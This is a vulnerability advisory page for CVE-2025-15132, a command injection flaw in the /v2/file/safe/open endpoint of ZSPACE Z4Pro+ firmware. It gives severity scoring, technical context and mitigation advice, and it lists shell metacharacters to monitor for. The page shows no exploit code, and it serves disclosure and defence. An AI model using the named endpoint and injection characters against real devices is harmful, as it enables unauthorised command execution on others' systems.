ZSPACE Z4Pro+ Firmware CVE-2025-15132
LOWSeverity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from NVD · only source for this CVE.
CVSS VectorNVD
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
1DescriptionCVE.org
A vulnerability was determined in ZSPACE Z4Pro+ 1.0.0440024. The affected element is the function zfilev2_api_open of the file /v2/file/safe/open of the component HTTP POST Request Handler. This manipulation causes command injection. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure.
AnalysisAI
Command injection in ZSPACE Z4Pro+ 1.0.0440024 via the /v2/file/safe/open HTTP POST endpoint allows authenticated remote attackers to execute arbitrary commands with limited impact on confidentiality, integrity, and availability. The vulnerability affects the zfilev2_api_open function and has been publicly disclosed with exploit code available; however, the EPSS score of 0.38% (59th percentile) and CVSS scope constraint (SC:N) suggest limited real-world exploitation risk despite authenticated remote access capability.
Technical ContextAI
The vulnerability exists in the HTTP POST request handler for the /v2/file/safe/open API endpoint within ZSPACE Z4Pro+ firmware. The underlying issue is CWE-74 (Improper Neutralization of Special Elements in Output Used by a Downstream Component, commonly known as command injection), where user-supplied input passed to the zfilev2_api_open function is not properly sanitized before being used in command construction or execution. ZSPACE Z4Pro+ is an embedded device running proprietary firmware, and this endpoint appears to handle file operations. The command injection flaw allows an authenticated user to break out of intended command boundaries and execute arbitrary shell commands, though the CVSS scope remains unchanged (SC:N), indicating the impact is confined to the vulnerable component without privilege escalation.
RemediationAI
No vendor-released patch has been identified at the time of this analysis. The vendor (ZSPACE) was contacted early about this disclosure per the description, but patch availability status is not confirmed in the provided references. Immediate remediation steps include: (1) restrict network access to the /v2/file/safe/open endpoint to trusted internal networks only, implementing firewall rules to deny unauthenticated or untrusted external access; (2) audit user accounts with authentication credentials to the Z4Pro+ device and revoke unnecessary access privileges, as authentication is required to exploit this vulnerability; (3) monitor HTTP POST requests to the /v2/file/safe/open endpoint for suspicious patterns or command metacharacters (pipes, semicolons, backticks, $(), &&, ||, etc.) and log all requests for forensic review; (4) if firmware updates become available from ZSPACE, prioritize patching to the latest stable release after testing in a non-production environment. Until a patch is available, the compensating control of network segmentation is critical - isolating Z4Pro+ devices to a restricted management VLAN reduces exposure. Organizations should contact ZSPACE directly for patch availability and timeline. Regularly check the ZSPACE support portal and GitHub repository references (https://github.com/LX-66-LX/cve/issues/2) for published fixes.
Share
External POC / Exploit Code
Leaving vuln.today